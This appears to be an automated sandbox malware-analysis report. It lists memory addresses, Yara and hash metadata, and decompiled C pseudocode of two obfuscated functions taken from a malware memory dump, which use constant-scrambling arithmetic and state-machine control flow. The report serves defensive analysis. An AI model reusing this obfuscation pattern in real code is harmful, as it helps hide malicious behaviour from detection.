                          0x001c5a09
                          0x001c5a14
                          0x001c5a1f
                          0x001c5a2a
                          0x001c5a35
                          0x001c5a3d
                          0x001c5a42
                          0x001c5a4a
                          0x001c5a4f
                          0x001c5a57
                          0x001c5a62
                          0x001c5a6d
                          0x001c5a78
                          0x001c5a83
                          0x001c5a8e
                          0x001c5a99
                          0x001c5aa1
                          0x001c5aa9
                          0x001c5ab1
                          0x001c5ab9
                          0x001c5ac1
                          0x001c5ac9
                          0x001c5ad1
                          0x001c5ad9
                          0x001c5ae1
                          0x001c5aec
                          0x001c5af1
                          0x001c5af7
                          0x001c5afc
                          0x001c5b04
                          0x001c5b0f
                          0x001c5b17
                          0x001c5b22
                          0x001c5b2a
                          0x001c5b32
                          0x001c5b3a
                          0x001c5b42
                          0x001c5b4a
                          0x001c5b57
                          0x001c5b58
                          0x001c5b5f
                          0x001c5b68
                          0x001c5b6c
                          0x001c5b74
                          0x001c5b7c
                          0x001c5b84
                          0x001c5b8c
                          0x001c5b94
                          0x001c5b9c
                          0x001c5ba6
                          0x001c5baa
                          0x001c5baf
                          0x001c5bb7
                          0x001c5bcb
                          0x001c5bd2
                          0x001c5bda
                          0x001c5be5
                          0x001c5bfc
                          0x001c5bff
                          0x001c5c06
                          0x001c5c11
                          0x001c5c19
                          0x001c5c1d
                          0x001c5c22
                          0x001c5c2a
                          0x001c5c32
                          0x001c5c3a
                          0x001c5c42
                          0x001c5c46
                          0x001c5c4e
                          0x001c5c56
                          0x001c5c5e
                          0x001c5c66
                          0x001c5c6b
                          0x001c5c73
                          0x001c5c7e
                          0x001c5c89
                          0x001c5c94
                          0x001c5c9c
                          0x001c5ca4
                          0x001c5cac
                          0x001c5cb4
                          0x001c5cbc
                          0x001c5cc0
                          0x001c5cc8
                          0x001c5cd0
                          0x001c5cd8
                          0x001c5ce0
                          0x001c5ce8
                          0x001c5cf0
                          0x001c5d03
                          0x001c5d0a
                          0x001c5d15
                          0x001c5d20
                          0x001c5d2b
                          0x001c5d36
                          0x001c5d41
                          0x001c5d4c
                          0x001c5d57
                          0x001c5d5f
                          0x001c5d6f
                          0x001c5d73
                          0x001c5d7b
                          0x001c5d83
                          0x001c5d8e
                          0x001c5da0
                          0x001c5da3
                          0x001c5da7
                          0x001c5daf
                          0x001c5dba
                          0x001c5dc2
                          0x001c5dcd
                          0x001c5dd5
                          0x001c5ddd
                          0x001c5de5
                          0x001c5dea
                          0x001c5df2
                          0x001c5dfa
                          0x001c5dff
                          0x001c5e07
                          0x001c5e0f
                          0x001c5e17
                          0x001c5e1f
                          0x001c5e24
                          0x001c5e2c
                          0x001c5e34
                          0x001c5e3c
                          0x001c5e44
                          0x001c5e49
                          0x001c5e53
                          0x001c5e5b
                          0x001c5e63
                          0x001c5e6b
                          0x001c5e70
                          0x001c5e78
                          0x001c5e83
                          0x001c5e8e
                          0x001c5e99
                          0x001c5ea4
                          0x001c5eaf
                          0x001c5eba
                          0x001c5ec2
                          0x001c5eca
                          0x001c5ed2
                          0x001c5eda
                          0x001c5ee2
                          0x001c5eea
                          0x001c5ef2
                          0x001c5efa
                          0x001c5f05
                          0x001c5f10
                          0x001c5f1b
                          0x001c5f23
                          0x001c5f2b
                          0x001c5f33
                          0x001c5f3b
                          0x001c5f40
                          0x001c5f4e
                          0x001c5f53
                          0x001c5f59
                          0x001c5f61
                          0x001c5f6c
                          0x001c5f77
                          0x001c5f82
                          0x001c5f8e
                          0x001c5f93
                          0x001c5f99
                          0x001c5f9e
                          0x001c5fa6
                          0x001c5fb1
                          0x001c5fbc
                          0x001c5fc7
                          0x001c5fcf
                          0x001c5fdb
                          0x001c5fde
                          0x001c5fe5
                          0x001c5fec
                          0x001c5ff3
                          0x001c5ff7
                          0x001c5fff
                          0x001c6007
                          0x001c600f
                          0x001c6017
                          0x001c601f
                          0x001c6024
                          0x001c602c
                          0x001c602c
                          0x001c602e
                          0x001c602f
                          0x001c602f
                          0x001c602f
                          0x001c602f
                          0x001c6035
                          0x00000000
                          0x00000000
                          0x001c6230
                          0x001c6236
                          0x001c62b2
                          0x001c62bb
                          0x001c62c0
                          0x00000000
                          0x001c6238
                          0x001c6238
                          0x001c623e
                          0x001c6287
                          0x001c6292
                          0x001c6292
                          0x001c6295
                          0x00000000
                          0x00000000
                          0x001c628f
                          0x001c628f
                          0x001c628f
                          0x001c6297
                          0x001c629a
                          0x00000000
                          0x001c6240
                          0x001c6240
                          0x001c6246
                          0x00000000
                          0x001c6248
                          0x001c6265
                          0x001c626a
                          0x001c626c
                          0x001c626f
                          0x001c6271
                          0x001c6277
                          0x001c602c
                          0x001c602c
                          0x001c602e
                          0x00000000
                          0x001c602e
                          0x001c602c
                          0x001c6271
                          0x001c6246
                          0x001c623e
                          0x001c6082
                          0x001c608d
                          0x001c608d
                          0x001c603b
                          0x001c620a
                          0x001c620f
                          0x001c6211
                          0x001c6214
                          0x001c6216
                          0x00000000
                          0x001c621c
                          0x001c621e
                          0x001c6223
                          0x001c6224
                          0x00000000
                          0x001c6224
                          0x001c6041
                          0x001c6047
                          0x001c60e9
                          0x001c60f2
                          0x001c60fa
                          0x001c6108
                          0x001c615f
                          0x001c6182
                          0x001c6187
                          0x001c618e
                          0x001c6191
                          0x001c602c
                          0x001c602c
                          0x001c602e
                          0x00000000
                          0x001c602e
                          0x001c604d
                          0x001c6053
                          0x001c60d7
                          0x001c60dc
                          0x001c60df
                          0x001c602c
                          0x001c602c
                          0x001c602e
                          0x00000000
                          0x001c602e
                          0x001c6055
                          0x001c605b
                          0x001c609f
                          0x001c60a6
                          0x001c60a6
                          0x001c602c
                          0x001c602c
                          0x001c602e
                          0x00000000
                          0x001c602e
                          0x001c605d
                          0x001c6063
                          0x00000000
                          0x001c6069
                          0x001c607a
                          0x001c6080
                          0x001c6063
                          0x001c605b
                          0x001c6053
                          0x001c6047
                          0x00000000
                          0x001c62c1
                          0x001c62c1
                          0x001c62c1
                          0x00000000
                          0x001c62cd

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "O$)5S$,-$19$Cb$Uu$hV$xW$|(*$g
                          • API String ID: 0-1036375657
                          • Opcode ID: 2d64fb1ffbd39a5cb4a32c6ad02e6282e8a40595467e60b1e7d5e2b6d3f80952
                          • Instruction ID: 53647c8c6a3750160c1732f0633844e2b661081363ffe6c59c615236bb8b5b20
                          • Opcode Fuzzy Hash: 2d64fb1ffbd39a5cb4a32c6ad02e6282e8a40595467e60b1e7d5e2b6d3f80952
                          • Instruction Fuzzy Hash: D422107150C380DFD3A8CF61C54AA9BBBE2FBD4748F10891DE29A96260C7B18948DF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C6869, Relevance: 12.9, Strings: 10, Instructions: 358COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E001C6869(signed int __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _t425;
				signed int _t445;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t496;
				void* _t497;
				signed int* _t501;

				_t501 =  &_v2784;
				_v2736 = 0xd70c46;
				_v2736 = _v2736 << 6;
				_v2736 = _v2736 >> 5;
				_v2736 = _v2736 ^ 0x01ae18a5;
				_v2628 = 0x2b2d03;
				_t496 = __ecx;
				_t497 = 0xe76a3a8;
				_t448 = 0x59;
				_v2628 = _v2628 / _t448;
				_v2628 = _v2628 ^ 0x000f0bd3;
				_v2780 = 0x555899;
				_v2780 = _v2780 ^ 0x1a2e1782;
				_v2780 = _v2780 >> 6;
				_t449 = 0x70;
				_v2780 = _v2780 * 0x1e;
				_v2780 = _v2780 ^ 0x0c60a122;
				_v2620 = 0x3757e0;
				_v2620 = _v2620 >> 0xf;
				_v2620 = _v2620 ^ 0x0002f966;
				_v2684 = 0xb11485;
				_v2684 = _v2684 >> 5;
				_v2684 = _v2684 << 2;
				_v2684 = _v2684 ^ 0x001d02ff;
				_v2728 = 0x41bcba;
				_v2728 = _v2728 / _t449;
				_v2728 = _v2728 | 0x0391f118;
				_v2728 = _v2728 ^ 0x0396fd83;
				_v2696 = 0xc1937c;
				_v2696 = _v2696 ^ 0x2234657c;
				_v2696 = _v2696 << 4;
				_v2696 = _v2696 ^ 0x2f5aa2df;
				_v2748 = 0x9680ae;
				_v2748 = _v2748 ^ 0xdbb0bcef;
				_v2748 = _v2748 + 0x5e53;
				_v2748 = _v2748 + 0x5e6f;
				_v2748 = _v2748 ^ 0xdb27b888;
				_v2704 = 0xc50fbb;
				_v2704 = _v2704 ^ 0x111a2fa3;
				_t450 = 0x2e;
				_v2704 = _v2704 / _t450;
				_v2704 = _v2704 ^ 0x0069a71a;
				_v2668 = 0xe40b9e;
				_v2668 = _v2668 ^ 0xdc1f8f20;
				_v2668 = _v2668 ^ 0xdcfe6789;
				_v2612 = 0xe14343;
				_v2612 = _v2612 << 0xf;
				_v2612 = _v2612 ^ 0xa1ab00ea;
				_v2772 = 0xbe2c30;
				_v2772 = _v2772 + 0xf5f8;
				_t451 = 0x19;
				_v2772 = _v2772 / _t451;
				_v2772 = _v2772 << 4;
				_v2772 = _v2772 ^ 0x007712b1;
				_v2720 = 0x61965;
				_t445 = 0x4d;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 7;
				_v2720 = _v2720 ^ 0x000aecf1;
				_v2604 = 0xad6ca1;
				_t452 = 0x1c;
				_v2604 = _v2604 / _t452;
				_v2604 = _v2604 ^ 0x000c2534;
				_v2756 = 0x44e9a5;
				_v2756 = _v2756 + 0xffff5377;
				_v2756 = _v2756 | 0x69391a2d;
				_v2756 = _v2756 >> 0xd;
				_v2756 = _v2756 ^ 0x0000d2ac;
				_v2652 = 0xe29325;
				_v2652 = _v2652 | 0x9951b1c8;
				_v2652 = _v2652 ^ 0x99fb4cd5;
				_v2680 = 0x106b4b;
				_v2680 = _v2680 >> 0xc;
				_v2680 = _v2680 ^ 0x0008378d;
				_v2660 = 0xce2cee;
				_v2660 = _v2660 ^ 0xabd025b6;
				_v2660 = _v2660 ^ 0xab117388;
				_v2636 = 0xe72c5a;
				_v2636 = _v2636 << 1;
				_v2636 = _v2636 ^ 0x01cfd1bd;
				_v2764 = 0xce9bac;
				_v2764 = _v2764 >> 0xd;
				_v2764 = _v2764 << 0xf;
				_v2764 = _v2764 ^ 0x6cd849b1;
				_v2764 = _v2764 ^ 0x6fe47cdc;
				_v2608 = 0xdab50e;
				_t453 = 0x6c;
				_v2608 = _v2608 * 0x58;
				_v2608 = _v2608 ^ 0x4b21ebc8;
				_v2644 = 0x21e7e8;
				_v2644 = _v2644 >> 6;
				_v2644 = _v2644 ^ 0x0003a4ec;
				_v2712 = 0xe3911c;
				_v2712 = _v2712 / _t445;
				_v2712 = _v2712 * 0x43;
				_v2712 = _v2712 ^ 0x00cdd074;
				_v2688 = 0xdd1a93;
				_v2688 = _v2688 ^ 0x7985c00e;
				_v2688 = _v2688 << 3;
				_v2688 = _v2688 ^ 0xcac8c97c;
				_v2616 = 0x5faab1;
				_v2616 = _v2616 ^ 0x1b6fd98f;
				_v2616 = _v2616 ^ 0x1b3ded53;
				_v2724 = 0x954f7;
				_v2724 = _v2724 / _t453;
				_v2724 = _v2724 ^ 0x5ad7c010;
				_v2724 = _v2724 ^ 0x5ad74941;
				_v2672 = 0xf78f3b;
				_v2672 = _v2672 << 9;
				_v2672 = _v2672 ^ 0xef18aa44;
				_v2732 = 0x9cb3b1;
				_v2732 = _v2732 >> 4;
				_v2732 = _v2732 ^ 0xe2d83eaa;
				_v2732 = _v2732 ^ 0xe2ddc922;
				_v2676 = 0x4f63c;
				_v2676 = _v2676 | 0x7938451b;
				_v2676 = _v2676 ^ 0x7932d1fc;
				_v2784 = 0x227d8e;
				_v2784 = _v2784 * 0x70;
				_v2784 = _v2784 + 0x10ae;
				_v2784 = _v2784 + 0xffff0036;
				_v2784 = _v2784 ^ 0x0f16d66c;
				_v2656 = 0x8f5d03;
				_v2656 = _v2656 + 0xffffcb10;
				_v2656 = _v2656 ^ 0x008c40fc;
				_v2664 = 0x147a35;
				_v2664 = _v2664 + 0x72cc;
				_v2664 = _v2664 ^ 0x0013eff9;
				_v2708 = 0x3f889f;
				_v2708 = _v2708 + 0xffffe0c7;
				_v2708 = _v2708 << 4;
				_v2708 = _v2708 ^ 0x03f50c5f;
				_v2776 = 0x4b8e23;
				_v2776 = _v2776 | 0x95de3289;
				_v2776 = _v2776 + 0xffffaca1;
				_v2776 = _v2776 >> 0xa;
				_v2776 = _v2776 ^ 0x0024a504;
				_v2716 = 0xa59736;
				_v2716 = _v2716 + 0xff6b;
				_v2716 = _v2716 | 0x7b3af132;
				_v2716 = _v2716 ^ 0x7bbb5486;
				_v2640 = 0x9c4b93;
				_v2640 = _v2640 + 0xffff33f3;
				_v2640 = _v2640 ^ 0x0090f653;
				_v2648 = 0xf61d93;
				_v2648 = _v2648 | 0x4192b52a;
				_v2648 = _v2648 ^ 0x41f40c5d;
				_v2632 = 0xed7875;
				_v2632 = _v2632 >> 9;
				_v2632 = _v2632 ^ 0x000d0692;
				_v2692 = 0x914f94;
				_v2692 = _v2692 ^ 0xe0988b56;
				_v2692 = _v2692 << 3;
				_v2692 = _v2692 ^ 0x004aa312;
				_v2768 = 0x3b95d3;
				_v2768 = _v2768 >> 0xe;
				_v2768 = _v2768 >> 8;
				_v2768 = _v2768 | 0x90778fa3;
				_v2768 = _v2768 ^ 0x907ffb5b;
				_v2700 = 0x78c939;
				_t454 = 0x4f;
				_v2700 = _v2700 / _t454;
				_v2700 = _v2700 * 0x43;
				_v2700 = _v2700 ^ 0x00613dde;
				_v2744 = 0xacd4ca;
				_v2744 = _v2744 * 0x60;
				_v2744 = _v2744 ^ 0x1bb6e038;
				_v2744 = _v2744 | 0x0be4115d;
				_v2744 = _v2744 ^ 0x5bf4c74e;
				_v2624 = 0xe52846;
				_v2624 = _v2624 | 0x37888519;
				_v2624 = _v2624 ^ 0x37e7174c;
				_v2752 = 0xa93f91;
				_v2752 = _v2752 * 0x6b;
				_v2752 = _v2752 * 0x7b;
				_v2752 = _v2752 ^ 0x7befb542;
				_v2752 = _v2752 ^ 0x86fdbe14;
				_v2740 = 0x2ae576;
				_v2740 = _v2740 + 0xbc14;
				_v2740 = _v2740 + 0xffff6f1a;
				_v2740 = _v2740 ^ 0x002d5a1a;
				_v2760 = 0x7dbeee;
				_v2760 = _v2760 << 0xa;
				_v2760 = _v2760 >> 7;
				_t425 = _v2760 * 0x13;
				_v2760 = _t425;
				_v2760 = _v2760 ^ 0x24a154d6;
				do {
					while(_t497 != 0x13254dd) {
						if(_t497 == 0xe76a3a8) {
							_t497 = 0x13254dd;
							continue;
						} else {
							_t509 = _t497 - 0xf9d6351;
							if(_t497 == 0xf9d6351) {
								E001CB3B4(_v2724, _t454, _v2672, _t454, _v2732,  &_v1040, _v2676, _v2736);
								_push(_v2664);
								_push(_v2656);
								E001D2EA5( &_v2080, _t509,  &_v1040, 0x1c14d4, _v2776, _v2716, E001DCD35(0x1c14d4, _v2784, _t509), _v2640, _v2648,  &_v520);
								E001D629F(_v2632, _t438, _v2692, _v2768, _v2700);
								return E001DEA55( &_v520, _v2744, 0, _v2624, 0, _v2752, 0, _v2740, _v2760, 0);
							}
							goto L9;
						}
						L5:
						return _t425;
					}
					E001D855C( &_v2600, _v2628, __eflags, _v2780, _v2620, _t454, _v2684);
					 *((short*)(E001C2B69(_v2728, _v2696,  &_v2600, _v2748))) = 0;
					E001C3432( &_v1560, _v2704, __eflags, _v2668);
					_push(_v2720);
					_push(_v2772);
					E001D2EA5( &_v1560, __eflags,  &_v2600, 0x1c1404, _v2756, _v2652, E001DCD35(0x1c1404, _v2612, __eflags), _v2680, _v2660,  &_v2080);
					E001D629F(_v2636, _t430, _v2764, _v2608, _v2644);
					_t454 = _t496;
					_t425 = E001DE5A7(_t496, _v2712, _v2688,  &_v2080, _v2616);
					_t501 =  &(_t501[0x17]);
					__eflags = _t425;
					if(_t425 != 0) {
						_t497 = 0xf9d6351;
						goto L9;
					}
					goto L5;
					L9:
					__eflags = _t497 - 0x7fda310;
				} while (__eflags != 0);
				return _t425;
			}

































































                          0x001c6869
                          0x001c686f
                          0x001c6879
                          0x001c687e
                          0x001c6883
                          0x001c688b
                          0x001c68a3
                          0x001c68a5
                          0x001c68aa
                          0x001c68af
                          0x001c68b8
                          0x001c68c3
                          0x001c68cb
                          0x001c68d3
                          0x001c68dd
                          0x001c68e0
                          0x001c68e4
                          0x001c68ec
                          0x001c68f7
                          0x001c68ff
                          0x001c690a
                          0x001c6912
                          0x001c6917
                          0x001c691c
                          0x001c6924
                          0x001c6934
                          0x001c6938
                          0x001c6940
                          0x001c6948
                          0x001c6950
                          0x001c6958
                          0x001c695d
                          0x001c6965
                          0x001c696d
                          0x001c6975
                          0x001c697d
                          0x001c6985
                          0x001c698d
                          0x001c6995
                          0x001c69a1
                          0x001c69a6
                          0x001c69ac
                          0x001c69b4
                          0x001c69bf
                          0x001c69ca
                          0x001c69d5
                          0x001c69e0
                          0x001c69e8
                          0x001c69f3
                          0x001c69fb
                          0x001c6a07
                          0x001c6a0c
                          0x001c6a12
                          0x001c6a17
                          0x001c6a1f
                          0x001c6a2b
                          0x001c6a2e
                          0x001c6a32
                          0x001c6a39
                          0x001c6a41
                          0x001c6a55
                          0x001c6a5a
                          0x001c6a61
                          0x001c6a6c
                          0x001c6a74
                          0x001c6a7c
                          0x001c6a84
                          0x001c6a89
                          0x001c6a91
                          0x001c6a9c
                          0x001c6aa7
                          0x001c6ab2
                          0x001c6aba
                          0x001c6abf
                          0x001c6ac7
                          0x001c6ad2
                          0x001c6add
                          0x001c6ae8
                          0x001c6af3
                          0x001c6afa
                          0x001c6b05
                          0x001c6b0d
                          0x001c6b12
                          0x001c6b17
                          0x001c6b1f
                          0x001c6b27
                          0x001c6b3c
                          0x001c6b3d
                          0x001c6b44
                          0x001c6b4f
                          0x001c6b5a
                          0x001c6b62
                          0x001c6b6d
                          0x001c6b7d
                          0x001c6b86
                          0x001c6b8a
                          0x001c6b92
                          0x001c6b9a
                          0x001c6ba2
                          0x001c6ba7
                          0x001c6baf
                          0x001c6bba
                          0x001c6bc5
                          0x001c6bd0
                          0x001c6bde
                          0x001c6be2
                          0x001c6bea
                          0x001c6bf2
                          0x001c6bfd
                          0x001c6c05
                          0x001c6c10
                          0x001c6c18
                          0x001c6c1d
                          0x001c6c25
                          0x001c6c2d
                          0x001c6c35
                          0x001c6c3d
                          0x001c6c45
                          0x001c6c52
                          0x001c6c56
                          0x001c6c5e
                          0x001c6c66
                          0x001c6c6e
                          0x001c6c79
                          0x001c6c84
                          0x001c6c91
                          0x001c6ca1
                          0x001c6cb1
                          0x001c6cbc
                          0x001c6cc4
                          0x001c6ccc
                          0x001c6cd1
                          0x001c6cd9
                          0x001c6ce1
                          0x001c6ce9
                          0x001c6cf1
                          0x001c6cf6
                          0x001c6cfe
                          0x001c6d06
                          0x001c6d0e
                          0x001c6d16
                          0x001c6d1e
                          0x001c6d29
                          0x001c6d34
                          0x001c6d3f
                          0x001c6d4a
                          0x001c6d55
                          0x001c6d60
                          0x001c6d6b
                          0x001c6d73
                          0x001c6d7e
                          0x001c6d86
                          0x001c6d8e
                          0x001c6d93
                          0x001c6d9b
                          0x001c6da3
                          0x001c6da8
                          0x001c6dad
                          0x001c6db5
                          0x001c6dbd
                          0x001c6dcb
                          0x001c6dce
                          0x001c6dd7
                          0x001c6ddb
                          0x001c6de3
                          0x001c6df0
                          0x001c6df4
                          0x001c6dfc
                          0x001c6e04
                          0x001c6e0c
                          0x001c6e17
                          0x001c6e22
                          0x001c6e2d
                          0x001c6e3a
                          0x001c6e43
                          0x001c6e47
                          0x001c6e4f
                          0x001c6e57
                          0x001c6e5f
                          0x001c6e67
                          0x001c6e6f
                          0x001c6e77
                          0x001c6e7f
                          0x001c6e84
                          0x001c6e89
                          0x001c6e8e
                          0x001c6e92
                          0x001c6e9a
                          0x001c6e9a
                          0x001c6ea8
                          0x001c6f91
                          0x00000000
                          0x001c6eae
                          0x001c6eae
                          0x001c6eb0
                          0x001c6eda
                          0x001c6edf
                          0x001c6eeb
                          0x001c6f33
                          0x001c6f53
                          0x00000000
                          0x001c6f83
                          0x00000000
                          0x001c6eb0
                          0x001c6f90
                          0x001c6f90
                          0x001c6f90
                          0x001c6fb6
                          0x001c6fe1
                          0x001c6feb
                          0x001c6ff0
                          0x001c6ff9
                          0x001c7047
                          0x001c7067
                          0x001c707a
                          0x001c708b
                          0x001c7090
                          0x001c7093
                          0x001c7095
                          0x001c709b
                          0x00000000
                          0x001c709b
                          0x00000000
                          0x001c709d
                          0x001c709d
                          0x001c709d
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6$CC$F($Z,$o^$ux$v*$|e4"$W7$!
                          • API String ID: 0-404381705
                          • Opcode ID: 69930bfa63ba22abe4ad05a7d35d3092e20669039caa3e183ea82bd0066f7367
                          • Instruction ID: da24251c69318503662eaed63282eec9c2834467d01c3777f2983cd1e93fa141
                          • Opcode Fuzzy Hash: 69930bfa63ba22abe4ad05a7d35d3092e20669039caa3e183ea82bd0066f7367
                          • Instruction Fuzzy Hash: 6E12FF715083809FD3A9CF61C58AA9BFBE1FBD4348F108A1DE5DA96260D7B18949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C7795, Relevance: 12.7, Strings: 10, Instructions: 225COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E001C7795() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t240;
				void* _t247;
				signed int _t248;
				intOrPtr* _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t255;
				void* _t275;
				signed int* _t279;

				_t279 =  &_v112;
				_v12 = 0x3769c;
				_v4 = 0;
				_v8 = 0x151e38;
				_v56 = 0x3d41f1;
				_v56 = _v56 + 0xffffd857;
				_v16 = 0;
				_t275 = 0x33815b;
				_t251 = 0x1d;
				_push("true");
				_v56 = _v56 / _t251;
				_v56 = _v56 ^ 0x80021b62;
				_v92 = 0xdcca16;
				_v92 = _v92 | 0x76de14f0;
				_v92 = _v92 + 0xffff8ede;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x6f36ea02;
				_v32 = 0x77758c;
				_v32 = _v32 | 0xc8e26dc8;
				_v32 = _v32 ^ 0xc8fd8a5b;
				_v36 = 0xb0485;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0xc127eeb7;
				_v104 = 0xcd60c4;
				_v104 = _v104 << 8;
				_pop(_t252);
				_v104 = _v104 * 0x33;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xa47e43fe;
				_v24 = 0xebb6b2;
				_v24 = _v24 * 0x56;
				_v24 = _v24 ^ 0x4f28e1eb;
				_v96 = 0x7a5126;
				_v96 = _v96 << 6;
				_v96 = _v96 | 0x630628b7;
				_v96 = _v96 + 0x3636;
				_v96 = _v96 ^ 0x7f9f3bbe;
				_v100 = 0x880cf0;
				_v100 = _v100 + 0xffff137b;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0x1cd5e106;
				_v100 = _v100 ^ 0x3d16cee0;
				_v60 = 0x1c038;
				_v60 = _v60 + 0x5e48;
				_v60 = _v60 + 0xffffa27b;
				_v60 = _v60 ^ 0x0000fead;
				_v28 = 0x7c413c;
				_v28 = _v28 + 0xffffdb9e;
				_v28 = _v28 ^ 0x0073b996;
				_v64 = 0x7141bf;
				_v64 = _v64 + 0xffff8145;
				_v64 = _v64 / _t252;
				_v64 = _v64 ^ 0x00081e28;
				_v52 = 0x81ec0d;
				_v52 = _v52 >> 1;
				_v52 = _v52 + 0xffffcd38;
				_v52 = _v52 ^ 0x004a5346;
				_v80 = 0xb145f4;
				_t253 = 0x3d;
				_v80 = _v80 / _t253;
				_v80 = _v80 + 0x829b;
				_v80 = _v80 * 0x57;
				_v80 = _v80 ^ 0x012858b7;
				_v84 = 0xd3764b;
				_v84 = _v84 << 8;
				_v84 = _v84 + 0x6fa3;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x76b49c4d;
				_v88 = 0x5d3077;
				_v88 = _v88 + 0x766;
				_v88 = _v88 + 0xffffc987;
				_v88 = _v88 + 0x6eb6;
				_v88 = _v88 ^ 0x005317af;
				_v40 = 0x975c43;
				_t254 = 0x63;
				_t248 = _v16;
				_v40 = _v40 * 0xe;
				_v40 = _v40 ^ 0x0848c60e;
				_v44 = 0x6008c2;
				_v44 = _v44 | 0x3bc5621d;
				_v44 = _v44 ^ 0x3bef26a9;
				_v108 = 0xd2d0da;
				_v108 = _v108 * 0x35;
				_v108 = _v108 + 0xffffff06;
				_v108 = _v108 * 0x13;
				_v108 = _v108 ^ 0x3d4167ed;
				_v112 = 0x257da6;
				_v112 = _v112 + 0x40eb;
				_v112 = _v112 + 0xffff725c;
				_v112 = _v112 / _t254;
				_v112 = _v112 ^ 0x000ff7fb;
				_v68 = 0x6a5fab;
				_v68 = _v68 | 0x92dad95d;
				_v68 = _v68 ^ 0x03dbdb0d;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x024a0fe3;
				_v72 = 0x2e74b0;
				_v72 = _v72 + 0x3ddf;
				_v72 = _v72 ^ 0x9da7b5bd;
				_v72 = _v72 << 0xa;
				_v72 = _v72 ^ 0x241b801f;
				_v76 = 0x735c6b;
				_v76 = _v76 ^ 0x38220f0e;
				_v76 = _v76 << 7;
				_v76 = _v76 | 0xb98203c4;
				_v76 = _v76 ^ 0xb9ab522c;
				_v48 = 0x3024d6;
				_v48 = _v48 + 0xfffff436;
				_v48 = _v48 >> 1;
				_v48 = _v48 ^ 0x0017b6fb;
				while(1) {
					L1:
					_t255 = 0x5c;
					while(1) {
						_t240 = 0xde0911a;
						do {
							L3:
							if(_t275 == 0x33815b) {
								_t275 = 0xb9bce4;
								goto L15;
							} else {
								if(_t275 == 0xb9bce4) {
									_t250 =  *0x1e5218 + 0x234;
									while(1) {
										__eflags =  *_t250 - _t255;
										if(__eflags == 0) {
											break;
										}
										_t250 = _t250 + 2;
										__eflags = _t250;
									}
									_t248 = _t250 + 2;
									_t275 = 0x367b54d;
									_t240 = 0xde0911a;
									continue;
								} else {
									if(_t275 == 0x367b54d) {
										_push(_v104);
										_push(_v36);
										__eflags = E001C975A(0x1c10a0,  &_v20, _v92, _v24, _v56, _v96, _v100, _v60, _v28, _v64, 0x1c10a0, 0x1c10a0, E001DCD35(0x1c10a0, _v32, __eflags));
										_t275 =  ==  ? 0xde0911a : 0xd16896e;
										E001D629F(_v52, _t241, _v80, _v84, _v88);
										_t279 =  &(_t279[0x10]);
										_t240 = 0xde0911a;
										_t255 = 0x5c;
										goto L15;
									} else {
										if(_t275 == 0x99837b9) {
											E001C9FE4(_v20, _v68, _v72, _v76, _v48);
										} else {
											if(_t275 != _t240) {
												goto L15;
											} else {
												_t247 = E001CED15(_v20, _v40, _v44, _t248, _v108, _v112);
												_t279 =  &(_t279[4]);
												_t275 = 0x99837b9;
												_v16 = 0 | _t247 == 0x00000000;
												goto L1;
											}
										}
									}
								}
							}
							L18:
							return _v16;
							L15:
							__eflags = _t275 - 0xd16896e;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}










































                          0x001c7795
                          0x001c7798
                          0x001c77a2
                          0x001c77a8
                          0x001c77b0
                          0x001c77b8
                          0x001c77c4
                          0x001c77c8
                          0x001c77d3
                          0x001c77d6
                          0x001c77d8
                          0x001c77de
                          0x001c77e6
                          0x001c77ee
                          0x001c77f6
                          0x001c77fe
                          0x001c7803
                          0x001c780b
                          0x001c7813
                          0x001c781b
                          0x001c7823
                          0x001c782b
                          0x001c7830
                          0x001c7838
                          0x001c7840
                          0x001c784a
                          0x001c784d
                          0x001c7851
                          0x001c7856
                          0x001c785e
                          0x001c786b
                          0x001c786f
                          0x001c7877
                          0x001c787f
                          0x001c7884
                          0x001c788c
                          0x001c7894
                          0x001c789c
                          0x001c78a4
